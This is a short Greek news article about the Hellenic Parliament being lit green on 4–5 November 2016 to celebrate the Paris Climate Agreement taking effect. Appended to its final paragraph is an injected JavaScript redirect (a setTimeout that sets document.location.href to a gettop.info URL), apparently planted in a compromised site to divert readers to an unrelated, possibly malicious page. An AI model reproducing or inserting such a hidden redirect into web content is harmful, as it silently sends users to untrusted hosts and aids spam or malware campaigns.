Στα… πράσινα η Βουλή για την έναρξη της Συμφωνίας των Παρισίων για το κλίμα

0
12

 

H Βουλή «γιορτάζει» την έναρξη της ισχύος της διεθνούς Συμφωνίας των Παρισίων για την Κλιματική Αλλαγή, και θα «βαφτεί» στα πράσινα, Παρασκευή και Σάββατο 4 και 5 Νοεμβρίου 2016, κατά τη διάρκεια της νύχτας.

Η Συμφωνία των Παρισίων, η οποία κυρώθηκε από τη Βουλή των Ελλήνων τον Οκτώβριο, αποτελεί την πρώτη παγκόσμια, νομικά δεσμευτική συμφωνία για το κλίμα, που επιτεύχθηκε στη Διάσκεψη του Παρισιού στις 12 Δεκεμβρίου 2015, στο πλαίσιο του Οργανισμού Ηνωμένων Εθνών.

Με κεντρική επιδίωξή της τον περιορισμό της υπερθέρμανσης του πλανήτη, η Συμφωνία των Παρισίων δημιουργεί ένα διαρκές, δεσμευτικό και διαφανές νομικό καθεστώς, σύμφωνα με το οποίο τα κράτη αναλαμβάνουν δεσμεύσεις για τη μείωση των εκπομπών αερίων του θερμοκηπίου και τη διαχείριση των επιπτώσεων της κλιματικής αλλαγής.

Σημειώνεται δε ότι προϋπόθεση για να τεθεί σε ισχύ η συμφωνία ήταν τουλάχιστον 55 χώρες, που αντιπροσωπεύουν τουλάχιστον το 55% των παγκόσμιων εκπομπών αερίων, να έχουν καταθέσει στον ΟΗΕ τα έγγραφα επικύρωσής της. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here